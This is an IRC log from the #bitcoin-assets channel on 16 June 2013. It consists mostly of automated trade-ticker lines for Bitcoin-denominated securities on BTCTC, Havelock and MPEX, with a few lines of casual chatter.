Jun 16 04:49:32 mod6 was last seen in #bitcoin-assets 2 days, 11 hours, 38 minutes, and 27 seconds ago: mjr_: cool! Jun 16 04:52:38 ;;seen mircea_popescu Jun 16 04:52:39 mircea_popescu was last seen in #bitcoin-assets 1 hour and 57 seconds ago: lolk Jun 16 05:00:22 [BTCTC] [TAT.ASICMINER] 9 @ 0.0295 = 0.2655 BTC [+] Jun 16 05:02:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.0295 = 0.059 BTC [+] Jun 16 05:04:04 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.006999 = 0.028 BTC [+] Jun 16 05:13:14 [HAVELOCK] [ASICM] 8 @ 0.0294 = 0.2352 BTC [-] Jun 16 05:17:35 [HAVELOCK] [ASICM] 1 @ 0.0294 BTC [-] Jun 16 05:17:44 [MPEX] [S.MPOE] 560 @ 0.00071159 = 0.3985 BTC [-] Jun 16 05:17:48 [MPEX] [S.MPOE] 5451 @ 0.00071141 = 3.8779 BTC [-] Jun 16 05:17:48 [MPEX] [S.MPOE] 7600 @ 0.00070915 = 5.3895 BTC [-] Jun 16 05:18:00 [MPEX] [S.MPOE] 2903 @ 0.00070697 = 2.0523 BTC [-] Jun 16 05:37:02 [BTCTC] [BITVPS] 2 @ 0.000707 = 0.0014 BTC [+] Jun 16 05:37:55 [BTCTC] [S.DICE-PT] 10 @ 0.00314 = 0.0314 BTC [-] Jun 16 05:38:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.0295 = 0.1475 BTC [+] Jun 16 05:38:40 [BTCTC] [TAT.ASICMINER] 22 @ 0.0295 = 0.649 BTC [+] Jun 16 05:40:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.029648 = 0.0889 BTC [+] Jun 16 05:40:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.029649 = 0.1482 BTC [+] Jun 16 05:46:11 [MPEX] [S.MPOE] 4923 @ 0.00070697 = 3.4804 BTC [-] Jun 16 05:46:12 [MPEX] [S.MPOE] 387 @ 0.00070628 = 0.2733 BTC [-] Jun 16 05:48:50 [BTCTC] [DMS.PURCHASE] 1 @ 0.066116 BTC [-] Jun 16 05:49:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.029649 BTC [+] Jun 16 05:51:44 [HAVELOCK] [ASICM] 17 @ 0.0294 = 0.4998 BTC [-] Jun 16 05:51:45 [HAVELOCK] [ASICM] 7 @ 0.02949997 = 0.2065 BTC [+] Jun 16 05:51:47 [HAVELOCK] [ASICM] 50 @ 0.02949998 = 1.475 BTC [+] Jun 16 05:51:48 [HAVELOCK] [ASICM] 10 @ 0.02949999 = 0.295 BTC [+] Jun 16 05:51:49 [HAVELOCK] [ASICM] 566 @ 0.0295 = 16.697 BTC [+] Jun 16 05:52:20 [BTCTC] [S.DICE-PT] 129 @ 0.002705 = 0.3489 BTC [-] Jun 16 05:52:22 [BTCTC] [S.DICE-PT] 38 @ 0.0027 = 0.1026 BTC [-] Jun 16 05:52:26 [BTCTC] [S.DICE-PT] 200 @ 0.002688 = 0.5376 BTC [-] Jun 16 05:52:27 [BTCTC] [S.DICE-PT] 1500 @ 0.002622 = 3.933 BTC [-] Jun 16 05:52:30 [BTCTC] [S.DICE-PT] 10 @ 0.00262 = 0.0262 BTC [-] Jun 16 05:52:33 [BTCTC] [S.DICE-PT] 30 @ 0.00251 = 0.0753 BTC [-] Jun 16 05:52:35 [BTCTC] [S.DICE-PT] 1 @ 0.00251 BTC [-] Jun 16 05:52:37 [BTCTC] [S.DICE-PT] 80 @ 0.002505 = 0.2004 BTC [-] Jun 16 05:52:41 [BTCTC] [S.DICE-PT] 80 @ 0.002502 = 0.2002 BTC [-] Jun 16 05:53:59 [BTCTC] [S.DICE-PT] 120 @ 0.002502 = 0.3002 BTC [-] Jun 16 05:54:02 [BTCTC] [S.DICE-PT] 50 @ 0.002501 = 0.1251 BTC [-] Jun 16 05:54:03 [MPEX] [S.MPOE] 6790 @ 0.00070606 = 4.7941 BTC [-] Jun 16 05:54:06 [BTCTC] [S.DICE-PT] 420 @ 0.0025 = 1.05 BTC [-] Jun 16 05:54:09 [BTCTC] [S.DICE-PT] 2000 @ 0.0025 = 5 BTC [-] Jun 16 05:58:29 [BTCTC] [TAT.VIRTUALMINE] 45 @ 0.006999 = 0.315 BTC [+] Jun 16 05:58:51 [BTCTC] [COGNITIVE] 1 @ 0.317 BTC [-] Jun 16 05:59:21 [BTCTC] [COGNITIVE] 1 @ 0.318 BTC [+] Jun 16 06:01:14 [MPEX] [S.MPOE] 12700 @ 0.00070832 = 8.9957 BTC [+] Jun 16 06:05:59 [BTCTC] [BITVPS] 8 @ 0.000707 = 0.0057 BTC [+] Jun 16 06:06:12 [BTCTC] [B.YABMC] 1 @ 0.01339 BTC [+] Jun 16 06:08:55 [BTCTC] [ASICMINER-PT] 1 @ 2.925 BTC [-] Jun 16 06:09:03 [BTCTC] [ASICMINER-PT] 2 @ 2.926 = 5.852 BTC [+] Jun 16 06:09:48 [BTCTC] [B.YABMC] 1 @ 0.013496 BTC [+] Jun 16 06:10:20 [BTCTC] [B.YABMC] 2 @ 0.013498 = 0.027 BTC [+] Jun 16 06:13:07 [BTCTC] [TAT.ASICMINER] 75 @ 0.029649 = 2.2237 BTC [+] Jun 16 06:16:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.029649 BTC [+] Jun 16 06:40:19 [HAVELOCK] [ASICM] 27 @ 0.0295 = 0.7965 BTC [+] Jun 16 06:44:13 [BTCTC] [ASICMINER-PT] 3 @ 2.9277 = 8.7831 BTC [+] Jun 16 06:54:10 [BTCTC] [TAT.ASICMINER] 7 @ 0.029648 = 0.2075 BTC [-] Jun 16 07:07:50 [MPEX] [S.MPOE] 2910 @ 0.00070832 = 2.0612 BTC [+] Jun 16 07:08:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006999 BTC [+] Jun 16 07:12:08 [BTCTC] [DMS.MINING] 2 @ 0.02681 = 0.0536 BTC [-] Jun 16 07:12:12 [BTCTC] [DMS.MINING] 3 @ 0.0268 = 0.0804 BTC [-] Jun 16 07:12:17 [BTCTC] [DMS.MINING] 6 @ 0.0267 = 0.1602 BTC [-] Jun 16 07:12:19 [BTCTC] [DMS.MINING] 5 @ 0.02661 = 0.1331 BTC [-] Jun 16 07:19:52 [BTCTC] [ASICMINER-PT] 3 @ 2.92798 = 8.7839 BTC [+] Jun 16 07:20:03 [BTCTC] [ESECURITYSABTC] 1 @ 0.29 BTC [-] Jun 16 07:21:06 [BTCTC] [ASICMINER-PT] 1 @ 2.92798 BTC [+] Jun 16 07:27:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006999 BTC [+] Jun 16 07:39:28 [BTCTC] [RSM] 5 @ 0.0179 = 0.0895 BTC [+] Jun 16 07:40:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.029647 BTC [-] Jun 16 07:46:04 [HAVELOCK] [HIM] 1 @ 0.3049 BTC [+] Jun 16 08:03:16 [BTCTC] [ASICMINER-PT] 1 @ 2.8565 BTC [-] Jun 16 08:03:18 [BTCTC] [ASICMINER-PT] 1 @ 2.856001 BTC [-] Jun 16 08:03:20 [BTCTC] [ASICMINER-PT] 1 @ 2.856 BTC [-] Jun 16 08:03:23 [BTCTC] [ASICMINER-PT] 1 @ 2.852 BTC [-] Jun 16 08:03:24 [BTCTC] [ASICMINER-PT] 3 @ 2.851 = 8.553 BTC [-] Jun 16 08:03:27 [BTCTC] [ASICMINER-PT] 1 @ 2.850301 BTC [-] Jun 16 08:03:29 [BTCTC] [ASICMINER-PT] 7 @ 2.85001 = 19.9501 BTC [-] Jun 16 08:03:34 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [-] Jun 16 08:03:39 [BTCTC] [ASICMINER-PT] 3 @ 2.84005 = 8.5202 BTC [-] Jun 16 08:03:42 [BTCTC] [ASICMINER-PT] 1 @ 2.8304 BTC [-] Jun 16 08:03:45 [BTCTC] [ASICMINER-PT] 2 @ 2.83 = 5.66 BTC [-] Jun 16 08:03:47 [BTCTC] [ASICMINER-PT] 1 @ 2.8271 BTC [-] Jun 16 08:03:50 [BTCTC] [ASICMINER-PT] 1 @ 2.8203 BTC [-] Jun 16 08:03:54 [BTCTC] [ASICMINER-PT] 1 @ 2.8202 BTC [-] Jun 16 08:04:04 [BTCTC] [ASICMINER-PT] 1 @ 2.8201 BTC [-] Jun 16 08:07:20 [BTCTC] [ASICMINER-PT] 10 @ 2.82011 = 28.2011 BTC [+] Jun 16 08:07:22 [BTCTC] [ASICMINER-PT] 1 @ 2.8201 BTC [-] Jun 16 08:07:23 [BTCTC] [ASICMINER-PT] 1 @ 2.812111 BTC [-] Jun 16 08:07:25 [BTCTC] [ASICMINER-PT] 1 @ 2.812 BTC [-] Jun 16 08:07:28 [BTCTC] [ASICMINER-PT] 10 @ 2.812 = 28.12 BTC [-] Jun 16 08:08:13 [MPEX] [S.MPOE] 9100 @ 0.00070763 = 6.4394 BTC [-] Jun 16 08:08:17 [MPEX] [S.MPOE] 990 @ 0.00070792 = 0.7008 BTC [+] Jun 16 08:08:19 [MPEX] [S.MPOE] 2760 @ 0.00070959 = 1.9585 BTC [+] Jun 16 08:09:14 [HAVELOCK] [ASICM] 10 @ 0.02979999 = 0.298 BTC [+] Jun 16 08:10:08 [BTCTC] [CRYPTO-TRADE] 1 @ 0.12106 BTC [-] Jun 16 08:11:48 [BTCTC] [CRYPTO-TRADE] 1 @ 0.12105 BTC [-] Jun 16 08:12:31 <[\\\]> woah Jun 16 08:12:38 <[\\\]> someone's dumping on the asicminer Jun 16 08:12:40 ;;ticker Jun 16 08:12:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.029002 BTC [-] Jun 16 08:12:41 BTCUSD ticker | Best bid: 99.50000, Best ask: 100.20000, Bid-ask spread: 0.70000, Last trade: 100.20000, 24 hour volume: 18586.09990634, 24 hour low: 98.26000, 24 hour high: 103.70000, 24 hour vwap: 100.85109 Jun 16 08:12:52 [BTCTC] [S.MPOE-PT] 20 @ 0.000645 = 0.0129 BTC [+] Jun 16 08:12:55 So you're dumping? Jun 16 08:13:00 TAKING A DUMP Jun 16 08:13:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.029001 = 0.058 BTC [-] Jun 16 08:13:34 [BTCTC] [TAT.ASICMINER] 38 @ 0.029001 = 1.102 BTC [-] Jun 16 08:15:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.029647 = 0.1186 BTC [+] Jun 16 08:16:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.029648 = 0.1186 BTC [+] **** BEGIN LOGGING AT Sun Jun 16 15:11:54 2013 Jun 16 15:13:16 [BTCTC] [DMS.SELLING] 3 @ 0.04121 = 0.1236 BTC [+] Jun 16 15:13:22 [BTCTC] [DMS.SELLING] 2 @ 0.04267 = 0.0853 BTC [+] Jun 16 15:13:24 [BTCTC] [DMS.SELLING] 1 @ 0.042987 BTC [+] Jun 16 15:17:44 [BTCTC] [B.YABMC] 8 @ 0.011101 = 0.0888 BTC [-] Jun 16 15:23:01 [BTCTC] [B.YABMC] 81 @ 0.011101 = 0.8992 BTC [-] Jun 16 15:24:18 [BTCTC] [ASICMINER-PT] 1 @ 2.869999 BTC [-] Jun 16 15:24:30 [BTCTC] [B.YABMC] 45 @ 0.011101 = 0.4995 BTC [-] Jun 16 15:24:57 [BTCTC] [ASICMINER-PT] 9 @ 2.87 = 25.83 BTC [+] Jun 16 15:25:21 [BTCTC] [TAT.ASICMINER] 30 @ 0.028998 = 0.8699 BTC [+] Jun 16 15:26:42 [BTCTC] [BTC-BOND] 8 @ 0.009996 = 0.08 BTC [+] Jun 16 15:28:18 [BTCTC] [BTC-BOND] 142 @ 0.009997 = 1.4196 BTC [+] Jun 16 15:30:24 [BTCTC] [DMS.MINING] 15 @ 0.027511 = 0.4127 BTC [-] Jun 16 15:30:26 [BTCTC] [DMS.MINING] 1 @ 0.02751 BTC [-] Jun 16 15:30:29 [BTCTC] [DMS.MINING] 17 @ 0.0275 = 0.4675 BTC [-] Jun 16 15:30:36 [BTCTC] [DMS.MINING] 20 @ 0.027111 = 0.5422 BTC [-] Jun 16 15:30:49 [BTCTC] [DMS.MINING] 10 @ 0.027105 = 0.2711 BTC [-] Jun 16 15:30:51 [BTCTC] [DMS.MINING] 10 @ 0.027101 = 0.271 BTC [-] Jun 16 15:30:53 [BTCTC] [DMS.MINING] 26 @ 0.0271 = 0.7046 BTC [-] Jun 16 15:30:55 [BTCTC] [DMS.MINING] 10 @ 0.026621 = 0.2662 BTC [-] Jun 16 15:30:56 [BTCTC] [DMS.MINING] 1 @ 0.02662 BTC [-] Jun 16 15:30:58 [BTCTC] [DMS.MINING] 40 @ 0.02662 = 1.0648 BTC [-] Jun 16 15:31:00 [BTCTC] [DMS.MINING] 25 @ 0.02661 = 0.6653 BTC [-] Jun 16 15:31:02 [BTCTC] [DMS.MINING] 50 @ 0.0266 = 1.33 BTC [-] Jun 16 15:31:04 [BTCTC] [DMS.MINING] 75 @ 0.0261 = 1.9575 BTC [-] Jun 16 15:31:06 [BTCTC] [DMS.MINING] 100 @ 0.026001 = 2.6001 BTC [-] Jun 16 15:31:07 [BTCTC] [DMS.MINING] 152 @ 0.025681 = 3.9035 BTC [-] Jun 16 15:33:43 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.006998 = 0.014 BTC [-] Jun 16 15:39:38 [BTCTC] [DMS.SELLING] 20 @ 0.0439 = 0.878 BTC [+] Jun 16 15:39:40 [BTCTC] [DMS.SELLING] 440 @ 0.044 = 19.36 BTC [+] Jun 16 15:40:33 [BTCTC] [DMS.MINING] 5 @ 0.029499 = 0.1475 BTC [+] Jun 16 15:40:45 [BTCTC] [DMS.MINING] 56 @ 0.02997 = 1.6783 BTC [+] Jun 16 15:46:35 [BTCTC] [ASICMINER-PT] 12 @ 2.87 = 34.44 BTC [+] Jun 16 15:51:09 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 16 16:00:13 [BTCTC] [TAT.ASICMINER] 40 @ 0.029 = 1.16 BTC [+] Jun 16 16:04:51 [BTCTC] [B.YABMC] 15 @ 0.0111 = 0.1665 BTC [-] Jun 16 16:04:52 [BTCTC] [TAT.ASICMINER] 8 @ 0.029 = 0.232 BTC [+] Jun 16 16:04:53 [BTCTC] [TAT.ASICMINER] 7 @ 0.029 = 0.203 BTC [+] Jun 16 16:12:03 [BTCTC] [TAT.ASICMINER] 7 @ 0.029 = 0.203 BTC [+] Jun 16 16:20:03 [MPEX] [S.MPOE] 1536 @ 0.00070782 = 1.0872 BTC [+] Jun 16 16:24:20 [BTCTC] [DMS.PURCHASE] 45 @ 0.066116 = 2.9752 BTC [-] Jun 16 16:29:39 thestringpuller so did you and the girl gouge your eyes out or how did that end ? Jun 16 16:36:56 [BTCTC] [TAT.ASICMINER] 12 @ 0.029 = 0.348 BTC [+] Jun 16 16:39:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.029 = 0.058 BTC [+] Jun 16 16:41:31 [BTCTC] [ASICMINER-PT] 5 @ 2.9 = 14.5 BTC [+] Jun 16 16:46:23 [BTCTC] [TAT.ASICMINER] 37 @ 0.029 = 1.073 BTC [+] Jun 16 16:55:21 [BTCTC] [S.DICE-PT] 100 @ 0.002606 = 0.2606 BTC [+] Jun 16 16:55:24 [BTCTC] [S.DICE-PT] 131 @ 0.002605 = 0.3413 BTC [-] Jun 16 16:55:31 [BTCTC] [S.DICE-PT] 1 @ 0.0026 BTC [-] Jun 16 16:55:34 [BTCTC] [S.DICE-PT] 200 @ 0.002521 = 0.5042 BTC [-] Jun 16 16:55:42 [BTCTC] [S.DICE-PT] 1 @ 0.002503 BTC [-] Jun 16 17:01:31 [MPEX] [S.MPOE] 255 @ 0.00070782 = 0.1805 BTC [+] Jun 16 17:05:22 .n Jun 16 17:06:11 [HAVELOCK] [ASICM] 2 @ 0.0295 = 0.059 BTC [-] Jun 16 17:06:56 [BTCTC] [TAT.ASICMINER] 8 @ 0.029598 = 0.2368 BTC [+] Jun 16 17:07:38 [BTCTC] [DMS.MINING] 10 @ 0.02975 = 0.2975 BTC [-] Jun 16 17:09:46 [BTCTC] [DMS.MINING] 1 @ 0.028 BTC [-] Jun 16 17:14:27 [HAVELOCK] [ASICM] 34 @ 0.0295 = 1.003 BTC [-] Jun 16 17:27:22 http://cuteoverload.com/2012/03/20/spring-sproinging/ Jun 16 17:29:21 [BTCTC] [TAT.ASICMINER] 22 @ 0.029596 = 0.6511 BTC [-] Jun 16 17:30:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.029597 = 0.148 BTC [+] Jun 16 17:38:31 [BTCTC] [S.MPOE-PT] 6 @ 0.000645 = 0.0039 BTC [+] Jun 16 17:40:20 [BTCTC] [BITVPS] 150 @ 0.000705 = 0.1058 BTC [+] Jun 16 17:40:22 [BTCTC] [BITVPS] 100 @ 0.000706 = 0.0706 BTC [+] Jun 16 17:40:23 [BTCTC] [BITVPS] 130 @ 0.000708 = 0.092 BTC [+] Jun 16 17:40:27 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 16 17:41:48 [BTCTC] [TAT.ASICMINER] 50 @ 0.029002 = 1.4501 BTC [-] Jun 16 17:46:28 [BTCTC] [DMS.MINING] 15 @ 0.027011 = 0.4052 BTC [-] Jun 16 17:46:29 [BTCTC] [DMS.MINING] 15 @ 0.02701 = 0.4052 BTC [-] Jun 16 17:46:31 [BTCTC] [DMS.MINING] 50 @ 0.027 = 1.35 BTC [-] Jun 16 17:46:45 [BTCTC] [DMS.PURCHASE] 5 @ 0.066116 = 0.3306 BTC [-] Jun 16 17:49:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.029001 BTC [-] Jun 16 17:50:05 [BTCTC] [DMS.PURCHASE] 500 @ 0.066116 = 33.058 BTC [-] Jun 16 17:55:45 [BTCTC] [BITVPS] 80 @ 0.000708 = 0.0566 BTC [+] Jun 16 17:55:46 [BTCTC] [BITVPS] 20 @ 0.000708 = 0.0142 BTC [+] Jun 16 17:57:00 [BTCTC] [DMS.MINING] 15 @ 0.0262 = 0.393 BTC [-] Jun 16 17:57:05 [BTCTC] [DMS.MINING] 12 @ 0.0261 = 0.3132 BTC [-] Jun 16 17:57:07 [BTCTC] [DMS.MINING] 20 @ 0.0261 = 0.522 BTC [-] Jun 16 17:57:09 [BTCTC] [DMS.MINING] 60 @ 0.026002 = 1.5601 BTC [-] Jun 16 17:57:10 [BTCTC] [DMS.MINING] 13 @ 0.02569 = 0.334 BTC [-] Jun 16 17:57:11 [BTCTC] [DMS.MINING] 348 @ 0.025683 = 8.9377 BTC [-] Jun 16 17:57:13 [BTCTC] [DMS.MINING] 32 @ 0.025682 = 0.8218 BTC [-] Jun 16 17:57:19 [BTCTC] [BITVPS] 25 @ 0.000708 = 0.0177 BTC [+] Jun 16 17:57:40 [BTCTC] [DMS.PURCHASE] 200 @ 0.066116 = 13.2232 BTC [-] Jun 16 17:58:55 [BTCTC] [BITVPS] 45 @ 0.000708 = 0.0319 BTC [+] Jun 16 18:02:06 [BTCTC] [DMS.MINING] 4 @ 0.02569 = 0.1028 BTC [+] Jun 16 18:02:08 [BTCTC] [DMS.MINING] 15 @ 0.025683 = 0.3852 BTC [-] Jun 16 18:02:10 [BTCTC] [DMS.MINING] 98 @ 0.025682 = 2.5168 BTC [-] Jun 16 18:03:48 [BTCTC] [DMS.PURCHASE] 82 @ 0.066116 = 5.4215 BTC [-] Jun 16 18:04:09 [BTCTC] [DMS.MINING] 100 @ 0.02568 = 2.568 BTC [-] Jun 16 18:15:13 [HAVELOCK] [HIM] 4 @ 0.295 = 1.18 BTC [-] Jun 16 18:18:39 [BTCTC] [S.DICE-PT] 4 @ 0.002759 = 0.011 BTC [+] Jun 16 18:19:56 [BTCTC] [DMS.MINING] 3 @ 0.025682 = 0.077 BTC [+] Jun 16 18:21:46 [BTCTC] [COGNITIVE] 5 @ 0.3179 = 1.5895 BTC [-] Jun 16 18:21:54 [BTCTC] [COGNITIVE] 1 @ 0.319 BTC [+] Jun 16 18:21:56 [BTCTC] [COGNITIVE] 3 @ 0.3195 = 0.9585 BTC [+] Jun 16 18:22:00 [BTCTC] [COGNITIVE] 10 @ 0.319869 = 3.1987 BTC [+] Jun 16 18:22:05 [BTCTC] [COGNITIVE] 14 @ 0.31988 = 4.4783 BTC [+] Jun 16 18:22:09 [BTCTC] [COGNITIVE] 15 @ 0.33 = 4.95 BTC [+] Jun 16 18:22:11 [BTCTC] [COGNITIVE] 1 @ 0.33 BTC [+] Jun 16 18:22:12 [BTCTC] [COGNITIVE] 1 @ 0.34 BTC [+] Jun 16 18:25:02 [BTCTC] [DMS.MINING] 3 @ 0.025682 = 0.077 BTC [+] Jun 16 18:25:38 [BTCTC] [DMS.MINING] 21 @ 0.025682 = 0.5393 BTC [+] Jun 16 18:25:44 [BTCTC] [PAJKA.BOND] 2 @ 0.0848 = 0.1696 BTC [+] Jun 16 18:25:58 [BTCTC] [PAJKA.BOND] 48 @ 0.0849 = 4.0752 BTC [+] Jun 16 18:26:01 [BTCTC] [PAJKA.BOND] 10 @ 0.085 = 0.85 BTC [+] Jun 16 18:26:02 [BTCTC] [PAJKA.BOND] 25 @ 0.087 = 2.175 BTC [+] Jun 16 18:26:06 [BTCTC] [PAJKA.BOND] 25 @ 0.087 = 2.175 BTC [+] Jun 16 18:26:07 [BTCTC] [PAJKA.BOND] 20 @ 0.087996 = 1.7599 BTC [+] Jun 16 18:26:09 [BTCTC] [PAJKA.BOND] 55 @ 0.087997 = 4.8398 BTC [+] Jun 16 18:26:10 [BTCTC] [PAJKA.BOND] 65 @ 0.087997 = 5.7198 BTC [+] Jun 16 18:26:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.029 = 0.058 BTC [-] Jun 16 18:27:26 [BTCTC] [DMS.PURCHASE] 11 @ 0.066116 = 0.7273 BTC [-] Jun 16 18:27:58 hi all Jun 16 18:28:06 [BTCTC] [DMS.MINING] 100 @ 0.026811 = 2.6811 BTC [+] Jun 16 18:28:21 [BTCTC] [BITVPS] 20 @ 0.000709 = 0.0142 BTC [+] Jun 16 18:30:17 [BTCTC] [DMS.MINING] 30 @ 0.026811 = 0.8043 BTC [+] Jun 16 18:31:12 [BTCTC] [ESECURITYSABTC] 1 @ 0.28999 BTC [-] Jun 16 18:31:13 [BTCTC] [ESECURITYSABTC] 1 @ 0.29 BTC [+] Jun 16 18:31:15 [BTCTC] [ESECURITYSABTC] 1 @ 0.3149 BTC [+] Jun 16 18:31:17 [BTCTC] [ESECURITYSABTC] 1 @ 0.315 BTC [+] Jun 16 18:31:18 [BTCTC] [ESECURITYSABTC] 1 @ 0.32 BTC [+] Jun 16 18:31:58 [BTCTC] [BASIC-MINING] 1 @ 0.698999 BTC [+] Jun 16 18:32:16 [HAVELOCK] [ASICM] 4 @ 0.02975 = 0.119 BTC [+] Jun 16 18:32:55 [BTCTC] [B.YABMC] 134 @ 0.013349 = 1.7888 BTC [+] Jun 16 18:32:57 [BTCTC] [B.YABMC] 1 @ 0.01335 BTC [+] Jun 16 18:32:59 [BTCTC] [B.YABMC] 1 @ 0.013498 BTC [+] Jun 16 18:33:01 [BTCTC] [B.YABMC] 15 @ 0.01375 = 0.2063 BTC [+] Jun 16 18:33:02 [BTCTC] [B.YABMC] 212 @ 0.01398 = 2.9638 BTC [+] Jun 16 18:33:03 [BTCTC] [B.YABMC] 47 @ 0.014739 = 0.6927 BTC [+] Jun 16 18:33:04 [BTCTC] [B.YABMC] 200 @ 0.01475 = 2.95 BTC [+] Jun 16 18:33:08 [BTCTC] [B.YABMC] 383 @ 0.0149 = 5.7067 BTC [+] Jun 16 18:33:09 [BTCTC] [B.YABMC] 7 @ 0.015 = 0.105 BTC [+] Jun 16 18:34:08 [BTCTC] [COGNITIVE] 1 @ 0.3428 BTC [+] Jun 16 18:34:12 [BTCTC] [COGNITIVE] 8 @ 0.345 = 2.76 BTC [+] Jun 16 18:34:14 [BTCTC] [COGNITIVE] 8 @ 0.35 = 2.8 BTC [+] Jun 16 18:34:22 [BTCTC] [COGNITIVE] 8 @ 0.35 = 2.8 BTC [+] Jun 16 18:35:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.028998 BTC [-] Jun 16 18:35:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.0285 = 0.057 BTC [-] Jun 16 18:35:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.02831 BTC [-] Jun 16 18:35:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.028302 = 0.0849 BTC [-] Jun 16 18:35:11 [BTCTC] [TAT.ASICMINER] 55 @ 0.028301 = 1.5566 BTC [-] Jun 16 18:35:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.0283 = 0.283 BTC [-] Jun 16 18:35:16 [BTCTC] [TAT.ASICMINER] 56 @ 0.0283 = 1.5848 BTC [-] Jun 16 18:35:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.028245 = 0.0565 BTC [-] Jun 16 18:35:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.0281 = 0.1124 BTC [-] Jun 16 18:35:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.028011 = 0.112 BTC [-] Jun 16 18:35:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02801 BTC [-] Jun 16 18:35:25 [BTCTC] [TAT.ASICMINER] 26 @ 0.02801 = 0.7283 BTC [-] Jun 16 18:35:27 [BTCTC] [TAT.ASICMINER] 56 @ 0.028 = 1.568 BTC [-] Jun 16 18:35:27 [BTCTC] [TAT.ASICMINER] 11 @ 0.028 = 0.308 BTC [-] Jun 16 18:37:07 [BTCTC] [TAT.ASICMINER] 49 @ 0.02795 = 1.3696 BTC [-] Jun 16 18:37:13 [BTCTC] [TAT.ASICMINER] 53 @ 0.027801 = 1.4735 BTC [-] Jun 16 18:37:16 [BTCTC] [TAT.ASICMINER] 25 @ 0.027612 = 0.6903 BTC [-] Jun 16 18:37:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.027611 BTC [-] Jun 16 18:37:31 [BTCTC] [TAT.ASICMINER] 38 @ 0.02761 = 1.0492 BTC [-] Jun 16 18:37:41 [BTCTC] [TAT.ASICMINER] 38 @ 0.02761 = 1.0492 BTC [-] Jun 16 18:37:43 [BTCTC] [TAT.ASICMINER] 38 @ 0.02761 = 1.0492 BTC [-] Jun 16 18:37:44 [BTCTC] [TAT.ASICMINER] 16 @ 0.02761 = 0.4418 BTC [-] Jun 16 18:39:24 [BTCTC] [DMS.MINING] 20 @ 0.027 = 0.54 BTC [+] Jun 16 18:42:10 [BTCTC] [DMS.MINING] 60 @ 0.027001 = 1.6201 BTC [+] Jun 16 18:42:12 [BTCTC] [DMS.MINING] 30 @ 0.02749 = 0.8247 BTC [+] Jun 16 18:42:12 [BTCTC] [DMS.MINING] 100 @ 0.0275 = 2.75 BTC [+] Jun 16 18:42:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.02761 = 0.2761 BTC [-] Jun 16 18:45:14 [BTCTC] [ASICMINER-PT] 2 @ 2.8999 = 5.7998 BTC [-] Jun 16 18:45:16 [BTCTC] [TAT.ASICMINER] 6 @ 0.028999 = 0.174 BTC [+] Jun 16 18:46:04 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 16 18:46:35 [BTCTC] [ASICMINER-PT] 2 @ 2.9 = 5.8 BTC [+] Jun 16 18:46:37 [BTCTC] [ASICMINER-PT] 3 @ 2.9 = 8.7 BTC [+] Jun 16 18:47:48 [BTCTC] [ASICMINER-PT] 1 @ 2.8999 BTC [-] Jun 16 18:49:06 [BTCTC] [TAT.ASICMINER] 5 @ 0.02761 = 0.1381 BTC [-] Jun 16 18:49:48 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 16 18:52:15 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 16 18:54:15 [HAVELOCK] [ASICM] 1 @ 0.02975 BTC [+] Jun 16 18:54:38 [HAVELOCK] [ASICM] 6 @ 0.02979998 = 0.1788 BTC [+] Jun 16 19:00:55 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 16 19:04:23 [HAVELOCK] [ASICM] 4 @ 0.029 = 0.116 BTC [-] Jun 16 19:04:55 [HAVELOCK] [ASICM] 1 @ 0.0287 BTC [-] Jun 16 19:05:08 [HAVELOCK] [ASICM] 1 @ 0.0286 BTC [-] Jun 16 19:05:33 [BTCTC] [DMS.MINING] 2 @ 0.028779 = 0.0576 BTC [+] Jun 16 19:05:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.028994 = 0.145 BTC [+] Jun 16 19:09:46 [BTCTC] [ASICMINER-PT] 1 @ 2.89999 BTC [-] Jun 16 19:12:58 [BTCTC] [DMS.MINING] 8 @ 0.028779 = 0.2302 BTC [+] Jun 16 19:13:00 [BTCTC] [DMS.MINING] 13 @ 0.02878 = 0.3741 BTC [+] Jun 16 19:13:01 [BTCTC] [DMS.MINING] 50 @ 0.0288 = 1.44 BTC [+] Jun 16 19:13:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.028992 = 0.087 BTC [-] Jun 16 19:13:03 [BTCTC] [DMS.MINING] 30 @ 0.029 = 0.87 BTC [+] Jun 16 19:13:04 [BTCTC] [DMS.MINING] 3 @ 0.0299 = 0.0897 BTC [+] Jun 16 19:13:05 [BTCTC] [DMS.MINING] 60 @ 0.029978 = 1.7987 BTC [+] Jun 16 19:13:06 [BTCTC] [DMS.MINING] 50 @ 0.03 = 1.5 BTC [+] Jun 16 19:13:08 [BTCTC] [DMS.MINING] 20 @ 0.03 = 0.6 BTC [+] 